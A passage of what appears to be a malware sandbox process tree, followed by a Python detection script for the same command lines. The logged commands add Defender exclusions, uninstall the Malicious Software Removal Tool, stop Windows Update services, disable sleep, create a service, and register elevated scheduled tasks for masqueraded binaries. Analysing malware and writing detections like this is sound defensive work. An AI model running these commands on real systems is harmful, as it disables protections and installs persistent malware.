          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU
            5⤵
            • Executes dropped EXE
                                                                            PID:1640
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD
                                                                          4⤵
                                                                            PID:2436
                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:2892
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3
                                                                            4⤵
                                                                              PID:1796
                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:2288
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE
                                                                              4⤵
                                                                                PID:1404
                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2192
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4
                                                                                4⤵
                                                                                  PID:968
                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1320
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T
                                                                                  4⤵
                                                                                    PID:820
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1788
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB
                                                                                    4⤵
                                                                                      PID:2176
                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:556
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6
                                                                                      4⤵
                                                                                        PID:1544
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6
                                                                                          5⤵
                                                                                            PID:1076
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960
                                                                                          4⤵
                                                                                            PID:2476
                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960
                                                                                              5⤵
                                                                                                PID:1684
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH
                                                                                              4⤵
                                                                                                PID:2280
                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH
                                                                                                  5⤵
                                                                                                    PID:1624
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0
                                                                                                  4⤵
                                                                                                    PID:1812
                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0
                                                                                                      5⤵
                                                                                                        PID:1552
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4
                                                                                                      4⤵
                                                                                                        PID:1072
                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4
                                                                                                          5⤵
                                                                                                            PID:2400
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB
                                                                                                          4⤵
                                                                                                            PID:1632
                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB
                                                                                                              5⤵
                                                                                                                PID:2408
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J
                                                                                                              4⤵
                                                                                                                PID:1924
                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J
                                                                                                                  5⤵
                                                                                                                    PID:2836
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97
                                                                                                                  4⤵
                                                                                                                    PID:2972
                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97
                                                                                                                      5⤵
                                                                                                                        PID:2352
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR
                                                                                                                      4⤵
                                                                                                                        PID:2900
                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR
                                                                                                                          5⤵
                                                                                                                            PID:2056
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR
                                                                                                                          4⤵
                                                                                                                            PID:2992
                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR
                                                                                                                              5⤵
                                                                                                                                PID:2772
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1
                                                                                                                              4⤵
                                                                                                                                PID:1616
                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1
                                                                                                                                  5⤵
                                                                                                                                    PID:1800
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7
                                                                                                                                  4⤵
                                                                                                                                    PID:1656
                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7
                                                                                                                                      5⤵
                                                                                                                                        PID:2664
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7
                                                                                                                                      4⤵
                                                                                                                                        PID:2808
                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7
                                                                                                                                          5⤵
                                                                                                                                            PID:2516
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N
                                                                                                                                          4⤵
                                                                                                                                            PID:2820
                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N
                                                                                                                                              5⤵
                                                                                                                                                PID:2656
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                              4⤵
                                                                                                                                                PID:2652
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                4⤵
                                                                                                                                                  PID:1448
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2588
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2576
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2888
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2816
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1296
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
      3⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
        4⤵
        PID:584
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
          5⤵
          • Loads dropped DLL
          PID:1116
          • C:\ChainReview\sphyperRuntimedhcpSvc.exe
            "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
            6⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            PID:2400
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Videos\explorer.exe'
              7⤵
              • Command and Scripting Interpreter: PowerShell
              PID:2352
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'
              7⤵
              • Command and Scripting Interpreter: PowerShell
              PID:2964
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\fr-FR\lsass.exe'
              7⤵
              • Command and Scripting Interpreter: PowerShell
              PID:776
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\taskhost.exe'
              7⤵
              • Command and Scripting Interpreter: PowerShell
              PID:2416
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\DevManView.exe'
              7⤵
              • Command and Scripting Interpreter: PowerShell
              PID:1552
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat"
              7⤵
              PID:1952
              • C:\Windows\system32\chcp.com
                chcp 65001
                8⤵
                PID:2476
              • C:\Windows\system32\PING.EXE
                ping -n 10 localhost
                8⤵
                • Runs ping.exe
                PID:1716
              • C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe
                "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe"
                8⤵
                • Executes dropped EXE
                PID:2208
    • C:\Users\Admin\AppData\Roaming\conhostsft.exe
      "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
      3⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Users\Admin\AppData\Roaming\.conhostsft.exe
        "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
        4⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        PID:2212
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          5⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          PID:1208
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          5⤵
          PID:268
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            6⤵
            • Drops file in Windows directory
            PID:1104
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          5⤵
          • Launches sc.exe
          PID:1796
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          5⤵
          • Launches sc.exe
          PID:1772
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          5⤵
          • Launches sc.exe
          PID:2964
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          5⤵
          • Launches sc.exe
          PID:1864
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          5⤵
          • Launches sc.exe
          PID:2084
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          5⤵
          PID:2700
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          5⤵
          PID:2244
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          5⤵
          PID:1632
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          5⤵
          PID:2836
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe delete "driverupdate"
          5⤵
          • Launches sc.exe
          PID:2392
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
          5⤵
          • Launches sc.exe
          PID:896
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop eventlog
          5⤵
          • Launches sc.exe
          PID:2672
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe start "driverupdate"
          5⤵
          • Launches sc.exe
          PID:2564
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Videos\explorer.exe'" /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:2744
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:2876
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:2528
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:2640
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f
  1⤵
  • Process spawned unexpected child process
  • Creates scheduled task(s)
  PID:2788
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2548
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2780
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1680
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2756
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\ChainReview\taskhost.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2752
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2516
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2552
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2600
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2948
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 7 /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2580
• C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
    1⤵
    PID:2320
• C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1619450566910135647-1410053359-1672108338-1974789323748415161-1532368068-438134973"
    1⤵
    PID:1580
• C:\ProgramData\VC_redist.x64.exe
    C:\ProgramData\VC_redist.x64.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetThreadContext
    PID:3024
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        PID:2588
    • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
        PID:2816
        • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            3⤵
            • Drops file in Windows directory
            PID:1768
    • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        2⤵
        • Launches sc.exe
        PID:1672
    • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        2⤵
        • Launches sc.exe
        PID:2520
    • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        2⤵
        • Launches sc.exe
        PID:2332
    • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        2⤵
        • Launches sc.exe
        PID:2880
    • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        2⤵
        • Launches sc.exe
        PID:1332
    • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        2⤵
        PID:2948
    • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        2⤵
        PID:2200
    • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        2⤵
        PID:1444
    • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        2⤵
        PID:2232
    • C:\Windows\system32\conhost.exe
        C:\Windows\system32\conhost.exe
        2⤵
        PID:604
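Two behaviours in the tree above are what a hunter would want to match in process-creation telemetry: the schtasks.exe entries, which register copies of explorer.exe, spoolsv.exe, lsass.exe and taskhost.exe from non-Windows directories as minute-interval and ONLOGON tasks (several with /rl HIGHEST), and the VC_redist.x64.exe subtree, which adds Defender exclusions with Add-MpPreference, uninstalls KB890830 (the Malicious Software Removal Tool), stops the Windows Update services with sc.exe, and zeroes the sleep and hibernate timeouts with powercfg. The following is an added example, not part of the sandbox report or of the sample: a Python classifier for command lines as they appear in Sysmon event 1 or EDR process events. The system-binary name list, the rule that a genuine copy of those binaries lives under C:\Windows, and the technique labels are this example's own assumptions; the sample lines are copied from the tree above, with the rundll32 entry kept as a benign control.

```python
"""Classify Windows process command lines into the persistence and
defence-evasion behaviours recorded in the process tree above.
Added example for this report; name lists, labels and the C:\Windows
rule are the example's assumptions, not sandbox output."""
import re
from dataclasses import dataclass

# System binary names the dropped payloads borrow.  A genuine copy lives
# under C:\Windows; the same file name anywhere else is a masquerade candidate.
SYSTEM_BINARY_NAMES = {
    "explorer.exe", "spoolsv.exe", "lsass.exe", "taskhost.exe",
    "svchost.exe", "csrss.exe", "winlogon.exe", "dwm.exe",
}
WINDOWS_DIR = "c:\\windows\\"
# Services the tree stops with sc.exe; all belong to Windows Update / delivery.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
MSRT_KB = "/kb:890830"          # KB890830 is the Malicious Software Removal Tool


@dataclass(frozen=True)
class Finding:
    technique: str
    detail: str


def tokenize(cmdline):
    """Split on whitespace but keep "..." spans (paths with spaces) whole, then
    drop the outer double quotes and the inner single quotes schtasks allows
    around the /tr value."""
    return [t.strip('"').strip("'") for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(tokens):
    """Map /option -> value for a `schtasks /create` line; value-less flags -> True."""
    opts, i = {}, 1
    while i < len(tokens):
        key = tokens[i].lower()
        if key.startswith("/"):
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
            opts[key] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return opts


def classify(cmdline):
    """Return the list of Findings for one command line (empty when benign)."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    lower = cmdline.lower()
    image = tokens[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
    out = []
    if image == "cmd" and len(tokens) > 2 and tokens[1].lower() == "/c":
        # Judge what cmd.exe was asked to run, not cmd.exe itself.
        return classify(cmdline[re.search(r"\s/c\s+", cmdline, re.I).end():])
    if image == "schtasks" and "/create" in lower:
        o = parse_schtasks(tokens)
        target = o.get("/tr") if isinstance(o.get("/tr"), str) else ""
        name = target.lower().rsplit("\\", 1)[-1]
        if name in SYSTEM_BINARY_NAMES and not target.lower().startswith(WINDOWS_DIR):
            out.append(Finding("masqueraded scheduled task", f"{o.get('/tn')} -> {target}"))
        if str(o.get("/sc", "")).upper() == "MINUTE":
            out.append(Finding("high-frequency task", f"every {o.get('/mo', 1)} min"))
        if str(o.get("/rl", "")).upper() == "HIGHEST":
            out.append(Finding("task runs elevated", "/rl HIGHEST"))
    elif image == "powershell" and "add-mppreference" in lower and "-exclusion" in lower:
        out.append(Finding("Defender exclusion added", cmdline.split(None, 1)[1]))
    elif image == "wusa" and "/uninstall" in lower and MSRT_KB in lower:
        out.append(Finding("MSRT removed", "wusa /uninstall /kb:890830"))
    elif (image == "sc" and len(tokens) >= 3 and tokens[1].lower() == "stop"
          and tokens[2].lower() in UPDATE_SERVICES):
        out.append(Finding("update service stopped", tokens[2]))
    elif image == "powercfg" and re.search(r"-(hibernate|standby)-timeout-(ac|dc)\s+0\b", lower):
        out.append(Finding("sleep/hibernate disabled", tokens[-2]))
    return out


def techniques(cmdline):
    return [f.technique for f in classify(cmdline)]


def summarize(cmdlines):
    """Count techniques over a batch of command lines (e.g. one host's Sysmon EID 1)."""
    counts = {}
    for line in cmdlines:
        for f in classify(line):
            counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


# Command lines copied from the process tree above; the rundll32 line is the benign control.
SAMPLE_TREE = r"""
C:\Windows\system32\schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
""".strip().splitlines()

if __name__ == "__main__":
    for line in SAMPLE_TREE:
        for f in classify(line):
            print(f"{f.technique:28} {f.detail}")
    print(summarize(SAMPLE_TREE))
```

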